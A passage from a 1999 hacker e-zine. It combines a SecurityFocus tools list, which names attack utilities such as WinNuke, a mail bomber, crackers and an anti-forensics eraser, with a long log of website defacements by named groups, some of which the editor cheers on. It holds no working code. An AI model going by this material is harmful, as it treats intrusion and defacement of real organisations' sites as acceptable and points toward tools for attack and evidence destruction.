Security Position Waanted in NJ or NYC Reply to: Gould, Beau - Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=3816170C.919BAEEA@nyc-search.com 2. Information Security Consultant(s) - NY #111 Reply to: Lori Sabat - Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=19991027151154.337.qmail@securityfocus.com 3. Security Awareness Specialist - NY #215 Reply to: Lori Sabat - Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=19991027152336.504.qmail@securityfocus.com VII. SECURITY SURVEY 1999-10-24 to 199-11-01 ---------------------------------------------- The question for 1999-10-24 to 199-11-01 was: "What do you think the primary motivator for recent vendor initiatives in security are?" Results: 1. They're genuinely concerned about security. 1% / 1 votes 2. They want good press. 1% / 1 votes 3. They want to avoid bad press, by being able to claim they're at least trying. 47% / 33 votes 4. Security is buzzword compliant. 43% / 30 votes Total number of votes: 69 votes VIII. SECURITY FOCUS TOP 6 TOOLS 1999-10-24 to 199-11-01 -------------------------------------------------------- 1. Security Focus Pager by Security Focus Relevant URL: http://www.securityfocus.com/pager This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable). 2. 
ShadowScan by RedShadow Relevant URL: http://www.securityfocus.com/data/tools/auditing/ShadowScan.zip Shadow Advantis Administrator Tools - Ping (SSPing), Port Scanner, , IP Scaner, Site Info (is intended for fast definition of services started on the host), Network Port Scaner,Tracert, Telnet,Nslookup, Finger,Echo,Time,UPD test,File Info, Compare File, Netstat, SysInfo,Crypt, Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info Shadow Hack and Crack - WinNuke, Mail Bomber, POP3, HTTP, SOCKS, FTP Crack (definitions of the password by a method of search),Unix password Crack, Finger over SendMail, Buffer Overlow , Smb Password Check , CRK Files ShadowPortGuard - code for detection of connection on the certain port Shadow Novell NetWare Crack - code for breaking Novell NetWare 4.x And more other functions... 3. East-Tec Eraser by EAST Technologies Relevant URL: http://www.securityfocus.com/data/tools/eerase20.zip East-Tec Eraser is an advanced security application designed to completely eliminate sensitive data from your computer. East-Tec Eraser works on Windows 98/95 and Windows NT. Eraser introduces a new meaning for the verb TO ERASE. Erasing a file now means wiping its contents beyond recovery, scrambling its name and dates and finally removing it from disk. When you want to get rid of sensitive files or folders beyond recovery, add them to the Eraser list of doomed files and ask Eraser to do the job. Eraser offers tight integration with the Windows shell, so you can drag files and folders from Explorer and drop them in Eraser, or you can erase them directly from Explorer by selecting "Erase beyond recovery" from the context menu. 4. Evidence Eliminator by ESoft(UK) Relevant URL: http://www.securityfocus.com/data/tools/eelm202.zip This security tool eliminates all evidence from your PC in one single click of a button. In tests, Evidence Eliminator defeats "Forensic Analysis" software as used by investigators, law-enforcement etc. 5. 
Access Sentinel 3.0 by Sentinel@XProc.com Relevant URL: http://www.securityfocus.com/data/tools/accsntl.zip Protect your Win95/98 files and folders with this kernel-mode operating system security extension. Tightly integrated with the Windows Shell, Sentinel allows you to hide, monitor, and block access to files and folders using nothing more than the Windows Explorer File Properties dialog. Also allows you to watch in realtime all activity on your harddrive. Designed for ease-of-use and minimal fuss. 6. Alot MoniCA 1.1 by Alot Enterprises Relevant URL: http://www.securityfocus.com/data/tools/amnset11.zip MoniCA is a Client Application Monitor. Why use MoniCA? You can use MoniCA when you want to know, Who, when and what were doing on your standalone and network computers. How long a particular program was running;. When your office computers were used not for business. What your family was doing when you were not at home. Who was reading your own documents. How to optimize computer usage in your office according to statistics. MoniCA can operate on local network and on a standalone computer as well. IX. SPONSOR INFORMATION - ------------------------------------------ URL: http://www.ntobjectives.com NT OBJECTives, Inc. is a small company dedicated to building network security tools for the Windows NT platform. Our current line of tools is directed at security forensics. We base our designs around fast, visually intuitive interfaces with a sharp focus on making security analysis easy. This is the foundation of our tool line. Our goal is for each of our successive product builds to enhance previous capabilities so that you have a comprehensive set of tools at your disposal. We keep abreast of current trends, tools, and issues, so that we can bring you quality network tools X. SUBSCRIBE/UNSUBSCRIBE INFORMATION ------------------------------------- 1. How do I subscribe? 
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of: SUBSCRIBE SF-NEWS Lastname, Firstname You will receive a confirmation request message to which you will have to anwser. 2. How do I unsubscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address with a message body of: UNSUBSCRIBE SF-NEWS If your email address has changed email aleph1@securityfocus.com and I will manualy remove you. 3. How do I disable mail delivery temporarily? If you will are simply going in vacation you can turn off mail delivery without unsubscribing by sending LISTSERV the command: SET SF-NEWS NOMAIL To turn back on e-mail delivery use the command: SET SF-NEWS MAIL 4. Is the list available in a digest format? Yes. The digest generated once a day. 5. How do I subscribe to the digest? To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message body of: SET SF-NEWS DIGEST 6. How do I unsubscribe from the digest? To turn the digest off send a message to LISTSERV with a message body of: SET SF-NEWS NODIGEST If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next. 7. I seem to not be able to unsubscribe. What is going on? You are probably subscribed from a different address than that from which you are sending commands to LISTSERV from. Either send email from the appropiate address or email the moderator to be unsubscribed manually. Alfred Huger VP of Operations Security Focus @HWA -=----------=- -=----------=- -=----------=- -=----------=- 0 0 0 o O O O 0 =----------=- -=----------=- -=----------=- -=----------=- -=----------=- =----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*****************************************************************************
*                                                                           *
*   ATTRITION.ORG   http://www.attrition.org                                *
*   ATTRITION.ORG   Advisory Archive, Hacked Page Mirror                    *
*   ATTRITION.ORG   DoS Database, Crypto Archive                            *
*   ATTRITION.ORG   Sarcasm, Rudeness, and More.                            *
*                                                                           *
*****************************************************************************

When people ask you "Who is Kevin Mitnick?" do you have an answer?

www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.com
        ########################################
        # Support 2600.com and the Free Kevin  #
        # defense fund site, visit it now!   . #
        #              FREE KEVIN!             #
        ########################################
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.com

http://www.2600.com/
http://www.kevinmitnick.com

+-----------------------------------------------------------------------------+
| SmoG Alert ..          http://smog.cjb.net/         NEWS on SCIENCE         |
| ===================    http://smog.cjb.net/         NEWS on SECURITY        |
| NEWS/NEWS/NEWS/NEWS    http://smog.cjb.net/         NEWS on THE NET         |
|                        http://smog.cjb.net/         NEWS on TECHNOLOGY      |
+-----------------------------------------------------------------------------+

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net   webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net   www.csoft.net   www.csoft.net   www.csoft.net   www.csoft.net *
* http://www.csoft.net   One of our sponsors, visit them now       www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV   *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD  *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM   *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to         //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed           //
// or cruciphux@dok.org                                                     //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous...

So, you want a puzzle, do you? Well, crack the 'code' at the beginning and end of the newsletter. Only one person has done it so far, so go ahead, get your crypto sk1llz out and try cracking it. It's easy!
(ASCII-art banner: "Send in your ASCII Art", flattened in extraction)

TOO, for inclusion in future issues. Do the HWA logo etc and we'll showcase it here to show off your talents...remember the 80's? dig out those ascii editors and do yer best...

(HWA block-letter logo, ASCII art flattened in extraction)

(ASCII cartoon: "HAX0R FOR HIRE ... WILL HACK FOR BACK ISSUES OF 2600", flattened in extraction)
(Ascii art from V0iD magazine #7)

Croatian Poetry contributed by ch4
(translated from the Croatian)

Panta rei ?!

Feet of feathers,
Hastily float across the snow,
While a butterfly crawls through the hurricane.

A bloody wave
Bashfully wipes away the stars,
While a cockroach breaks the bones of a lion.

A burnt leaf
Swallows the excrement of a robot,
So that they may steal the horns from the whale.

By sime

-=-

Contributed by FProphet

Found this while trolling the net, check out some other words on the engine, it's quite funny.

http://www.dictionary.com/cgi-bin/dict.pl?term=warez%20d00dz

warez d00dz /weirz doodz/ /n./ A substantial subculture of crackers refer to themselves as `warez d00dz'; there is evidently some connection with B1FF here. As `Ozone Pilot', one former warez d00d, wrote:

Warez d00dz get illegal copies of copyrighted software. If it has copy protection on it, they break the protection so the software can be copied. Then they distribute it around the world via several gateways.
Warez d00dz form badass group names like RAZOR and the like. They put up boards that distribute the latest ware, or pirate program. The whole point of the Warez sub-culture is to get the pirate program released and distributed before any other group. I know, I know. But don't ask, and it won't hurt as much. This is how they prove their poweress [sic]. It gives them the right to say, "I released King's Quest IVXIX before you so obviously my testicles are larger." Again don't ask...

The studly thing to do if one is a warez d00d, it appears, is emit `0-day warez', that is copies of commercial software copied and cracked on the same day as its retail release. Warez d00ds also hoard software in a big way, collecting untold megabytes of arcade-style games, pornographic GIFs, and applications they'll never use onto their hard disks. As Ozone Pilot acutely observes:

[BELONG] is the only word you will need to know. Warez d00dz want to belong. They have been shunned by everyone, and thus turn to cyberspace for acceptance. That is why they always start groups like TGW, FLT, USA and the like. Structure makes them happy.

[...]

Warez d00dz will never have a handle like "Pink Daisy" because warez d00dz are insecure. Only someone who is very secure with a good dose of self-esteem can stand up to the cries of fag and girlie-man. More likely you will find warez d00dz with handles like: Doctor Death, Deranged Lunatic, Hellraiser, Mad Prince, Dreamdevil, The Unknown, Renegade Chemist, Terminator, and Twin Turbo. They like to sound badass when they can hide behind their terminals. More likely, if you were given a sample of 100 people, the person whose handle is Hellraiser is the last person you'd associate with the name.

The contrast with Internet hackers is stark and instructive. See cracker, wannabee, handle, elite; compare weenie, spod.

@HWA

SITE.1 You can send in submissions for this section too if you've found (or RUN) a cool site...
@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

(ASCII-art section banner, flattened in extraction)

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist.

>Start<

Naval School of Health Sciences (www-nshs.med.navy.mil)
Energy Systems Division, Argonne National Labs (www.es.anl.gov)
Solid State Theory Group, National Renewable Energy Laboratory (www.sst.nrel.gov)
Naval Medical Research Institute (www.nmri.nnmc.navy.mil)
National Institute on Alcohol Abuse and Alcoholism (www.niaaa.nih.gov)
USDA Rural Development (www.rurdev.usda.gov)
U.S. Tax Court (www.ustaxcourt.gov)
Federal Occupational Health, DHHS (www.foh.dhhs.gov)
Rural Empowerment Zones and Enterprise Communities, USDA and HUD (www.ezec.gov)
U.S. Navy Electronic Commerce Homepage (www.ec.navsup.navy.mil)
Defense Commissary Agency (www.deca.mil) #2
Malaysian Science and Technology Information Centre (www.mastic.gov.my)
Banco Federativo (federativo.bndes.gov.br)
Account View (www.accountview.nl) #2
Bureau of Transportation for Taipei City (www.dot.taipei.gov.tw)
Nanning - Guangxi (www.nn.gx.cn)

Defaced domain: dssg-web-srv.ncr.disa.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/10/31/dssg-web-srv.ncr.disa.mil
Defaced by: fuqraq
Operating System: NT
Date 11/1/99

Defaced domain: www.adb-partner.no
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.adb-partner.no
Defaced by: unknown
Operating System: NT
Date 11/1/99

Defaced domain: www.shop.worldonline.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.shop.worldonline.nl
Defaced by: unknown
Operating System: NT
Date 11/1/99

Defaced domain: www.mita.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.mita.nl
Defaced by: Phreak.nl
Operating System: NT
Date 11/1/99

Defaced domain: ustecnet.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/ustecnet.com
Defaced by: dhc
Operating System: NT
Date 11/1/99

Defaced domain: dawn.worldonline.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/dawn.worldonline.nl
Defaced by: phreak.nl
Operating System: NT
Date 11/1/99

Defaced domain: hydr.ct.tudelft.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/hydr.ct.tudelft.nl
Defaced by: phreak.nl
Operating System: NT
Date 11/1/99

Defaced domain: www.netopia.no
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.netopia.no
Defaced by: unknown
Operating System: NT
Date 11/1/99

Defaced domain: www.adam.au.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.adam.au.com
Defaced by: phreak.nl
Operating System: Linux
Date 11/1/99

Defaced domain: www.dnd.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.dnd.ca
Defaced by: hv2k
Operating System: NT
Date 11/1/99

Defaced domain: www.itcampeche.edu.mx
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.itcampeche.edu.mx
Defaced by: treaty
Operating System: Solaris
Date 11/1/99

Defaced domain: www.doeal.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.doeal.gov
Defaced by: Pakistan HC
Operating System: Windows NT (IIS/4.0)
Date 11/1/99

Defaced domain: maif.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/maif.gov
Defaced by: Hi-Tech Hate/h4p
Operating System: Fingerprint failed (!)
Date 11/1/99

Defaced domain: webster.webfld.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/webster.webfld.navy.mil
Defaced by: hv2k
Operating System: NT
Date 11/1/99

Defaced domain: www.ummah.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.ummah.net
Operating System: FreeBSD (Apache 1.3b5)
Date 11/1/99

Defaced domain: www.cnu.gov.ve
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.cnu.gov.ve
Defaced by: Hven team
Operating System: Windows NT
Date 11/1/99

Defaced domain: www.iwakuni.usmc.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.iwakuni.usmc.mil
Defaced by: hV2k
Operating System: Windows NT
Date 11/1/99

Defaced domain: www.norfolk.atrc.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.norfolk.atrc.navy.mil
Defaced by: hV2k
Operating System: Windows NT
Date 11/1/99

Defaced domain: www.tenderimages.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.tenderimages.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Date 11/2/99

Defaced domain: www.esdcinc.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.esdcinc.com
Defaced by: Contr0l-C
Operating System: Windows NT (IIS/4.0)
Date 11/2/99

Defaced domain: www.fbody.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.fbody.com
Defaced by: HiP
Operating System: BSDI 3.0 (Apache 1.2.6)
Date 11/2/99

Defaced domain: www.hardcorebands.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.hardcorebands.com
Defaced by: HiP
Operating System: Linux (Apache/1.3.3)
Date 11/2/99

Defaced domain: federativo.bndes.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/federativo.bndes.gov.br
Defaced by: JxLxMx
Operating System: NT
Date 11/2/99

Defaced domain: www.seplan.gov.br #1
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.seplan.gov.br
Defaced by: JxLxMx
Operating System: NT

Defaced domain: www.kyungsung.ac.kr
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.kyungsung.ac.kr
Defaced by: kryptek
Operating System: Solaris
Date 11/2/99

Defaced domain: www.gennet.ee
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.gennet.ee
Defaced by: Verb0
Operating System: Windows NT
Date 11/2/99

Defaced domain: www.chapman-lab.uaf.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.chapman-lab.uaf.edu
Defaced by: Verb0
Operating System: Windows NT
Date 11/2/99

Defaced domain: www.seplan.gov.br #2
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.seplan.gov.br
Defaced by: Fuby
Operating System: Windows NT
Date 11/2/99

Defaced domain: www.mog.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.mog.gov.br
Defaced by: Fuby
Operating System: Windows NT
Date 11/2/99

Defaced domain: www.cateringnet.co.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.cateringnet.co.uk
Defaced by: Fuby
Operating System: Windows NT
Date 11/2/99

Defaced domain: www.creactive.fr
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.creactive.fr
Defaced by: Fuby
Operating System: Windows NT
Date 11/2/99

Defaced domain: www.nn.gx.cn
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.nn.gx.cn
Defaced by: kryptek
Operating System: Solaris
Date 11/2/99

Defaced domain: www.statssa.gov.za
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.statssa.gov.za
Defaced by: Fuby
Operating System: Windows NT
Date 11/2/99

Defaced domain: www.accountview.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.accountview.nl
Defaced by: Hit2000
Operating System: Windows NT (IIS/4.0)
Date 11/2/99

Defaced domain: www-nehc.med.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www-nehc.med.navy.mil
Operating System: Windows NT (IIS/4.0)
Date 11/2/99

Defaced domain: www.dot.taipei.gov.tw
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.dot.taipei.gov.tw
Defaced by: Fuby
Operating System: Windows NT (IIS/4.0)
Date 11/2/99

Defaced domain: federativo.bndes.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/federativo.bndes.gov.br
Defaced by: Fuby
Operating System: Windows NT (IIS/4.0)
Date 11/2/99

Defaced domain: www.mastic.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.mastic.gov.my
Defaced by: Fuby
Operating System: Windows NT (IIS/3.0)
Date 11/2/99

Defaced domain: www.deca.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.deca.mil
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/2/99

Defaced domain: www.cipex.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.cipex.com.br
Defaced by: Death Knights
Operating System: Linux (Apache 1.3.6)
Date 11/2/99

Defaced domain: www.paradoxtech.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.paradoxtech.com
Defaced by: n45ty
Operating System: Linux (Apache 1.3.6)
Date 11/2/99

Defaced domain: www.ngc.peachnet.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.ngc.peachnet.edu
Defaced by: xhostile and MetalTung
Operating System: Windows NT (IIS/4.0)
Date 11/3/99

Defaced domain: www.ezec.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.ezec.gov
Defaced by: hV2k
Operating System: NT
Date 11/3/99

Defaced domain: www.foh.dhhs.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.foh.dhhs.gov
Defaced by: hV2k
Operating System: NT
Date 11/3/99

Defaced domain: www.copcomputer.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.copcomputer.com
Operating System: BSDI (Apache 1.2.4)
Date 11/3/99

Defaced domain: www.ec.navsup.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.ec.navsup.navy.mil
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/3/99

Defaced domain: www.statssa.gov.za
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.statssa.gov.za
Defaced by: OzzMan
Operating System: Windows NT
Date 11/3/99

Defaced domain: www.sefaz.go.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.sefaz.go.gov.br
Defaced by: Inferno.BR
Operating System: Windows NT
Date 11/3/99

Defaced domain: www.ktb.co.kr
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.ktb.co.kr
Defaced by: kryptek
Operating System: Solaris 2.5x (NCSA/1.5)
Date 11/3/99

Defaced domain: www.rurdev.usda.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.rurdev.usda.gov
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/3/99

Defaced domain: www.ustaxcourt.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.ustaxcourt.gov
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/3/99

Defaced domain: www.cram-sudest.fr
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.cram-sudest.fr
Defaced by: JLM
Operating System: Windows NT (IIS/4.0)
Date 11/3/99

Defaced domain: www.bearland.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.bearland.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Date 11/3/99

Defaced domain: www.nyise.org/access
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nyise.org/access
Defaced by: PhantasmP
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.coopvgg.com.ar
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.coopvgg.com.ar
Defaced by: vendetta
Operating System: Solaris 2.x (Netscape-Enterprise 3.5.1)
Date 11/3/99

Defaced domain: mecara.fpms.ac.be
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/mecara.fpms.ac.be
Defaced by: Genocide Juice
Operating System: Linux
Date 11/3/99

Defaced domain: www.ceaa.gc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.ceaa.gc.ca
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/3/99

Defaced domain: www.nf.hrdc-drhc.gc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nf.hrdc-drhc.gc.ca
Defaced by: hV2k
Operating System: NT
Date 11/3/99

Defaced domain: www.nf.hrdc-drhc.gc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nf.hrdc-drhc.gc.ca
Defaced by: hV2k
Operating System: NT
Date 11/4/99

Defaced domain: www.acadiau.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/10/31/www.acadiau.ca
Defaced by: p0g0
Operating System: Solaris 2.5x (Apache 1.3.1)
Date 11/4/99

Defaced domain: www.ftscpac.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/10/30/www.ftscpac.navy.mil
Defaced by: Pakistan Hackerz Club
Operating System: Windows NT
Date 11/4/99

Defaced domain: www.lcc.whecn.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.lcc.whecn.edu
Defaced by: MetalTung and xhostile
Operating System: NT
Date 11/4/99

Defaced domain: www.oak.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.oak.edu
Defaced by: xhostile and MetalTung
Operating System: NT
Date 11/4/99

Defaced domain: www.gov.nf.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.gov.nf.ca
Defaced by: hV2k
Operating System: NT
Date 11/4/99

Defaced domain: www.borealc.on.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.borealc.on.ca
Defaced by: Adoni and symbolik
Operating System: NT
Date 11/4/99

Defaced domain: www.nmri.nnmc.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nmri.nnmc.navy.mil
Defaced by: fuqrag
Operating System: NT
Date 11/4/99

Defaced domain: www.pakbiz.com.pk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.pakbiz.com.pk
Defaced by: h1gh
Operating System: PowerBSD - Apache/1.2.6
Date 11/4/99

Defaced Page: http://www.navy.mi.th/main.htm
Defaced by: Verbo
OS: Windows NT/IIS 3.0
Date 11/4/99

Defaced domain: www.beckie.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.beckie.com
Defaced by: Blade/Psycho Surfer
Operating System: NT
Date 11/4/99

Defaced domain: www.mastic.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.mastic.gov.my
Defaced by: fuby
Operating System: NT
Date 11/4/99

Defaced domain: innebandy.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/innebandy.net
Defaced by: SunDevil & Zolar
Operating System: NT
Date 11/4/99

Defaced domain: www.sci.hiroshima-u.ac.jp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.sci.hiroshima-u.ac.jp
Defaced by: kryptek
Operating System: Solaris
Date 11/4/99

Defaced domain: www.zedd.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.zedd.com
Defaced by: SunDevil
Operating System: NT
Date 11/4/99

Defaced domain: www.cga.state.ct.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.cga.state.ct.us
Defaced by: aL3x
Operating System: NT
Date 11/4/99

Defaced domain: www.perfectplan.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.perfectplan.com
Defaced by: SunDevil
Operating System: NT
Date 11/4/99

Defaced domain: www.sst.nrel.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.sst.nrel.gov
Defaced by: hV2k
Operating System: NT
Date 11/4/99

Defaced domain: www.nyise.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.nyise.org
Defaced by: Fuby (again)
Operating System: Windows NT (IIS/4.0)
Date 11/4/99

Defaced domain: www.es.anl.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.es.anl.gov
Defaced by: hV2k
Operating System: NT
Date 11/4/99

Defaced domain: www.digisys.com.lb
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.digisys.com.lb
Defaced by: w0lf
Operating System: Irix
Date 11/4/99

Defaced domain: www.melissa.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.melissa.com
Defaced by: p4riah
Operating System: Solaris
Date 11/4/99

Defaced domain: www.lucifer.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.lucifer.com
Defaced by: Gabriel
Operating System: Linux
Date 11/4/99

Defaced domain: www.saltillo.gob.mx
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.saltillo.gob.mx
Defaced by: hi tech hate
Operating System: SCO
Date 11/5/99

Defaced domain: russian.dmll.cornell.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/russian.dmll.cornell.edu
Defaced by: Narcissus
Operating System: Windows NT (WebSite/1.1h)
Date 11/5/99

Defaced domain: www.nabco.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.nabco.org
Defaced by: kryptek
Operating System: Solaris
Date 11/5/99

Defaced domain: www.financials98.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.financials98.com
Defaced by: verb0
Operating System: NT
Date 11/5/99

Defaced: www.jn.pt
By: f0rpaxe
mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.jn.pt/
os: Windows NT (IIS/4.0)
Date 11/5/99

Defaced domain: www-nshs.med.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www-nshs.med.navy.mil
Defaced by: Verb0
Operating System: Windows NT
Date 11/5/99

Defaced domain: www.aecl.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.aecl.ca
Defaced by: ch4x
Operating System: NT
Date 11/5/99

Defaced domain: www.freeshells.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.freeshells.com
Defaced by: xhostile
Operating System: NT
Date 11/5/99

Defaced domain: parkscanada.pch.gc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/parkscanada.pch.gc.ca
Defaced by: chem/Shark
Operating System: NT
Date 11/5/99

Defaced domain: interal.qc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/interal.qc.ca
Defaced by: unknown
Operating System: NT
Date 11/5/99

Defaced domain: canadacouncil.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/canadacouncil.ca
Defaced by: unknown
Operating System: NT
Date 11/5/99

Defaced domain: www.cornwall.ac.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.cornwall.ac.uk
Defaced by: vendetta
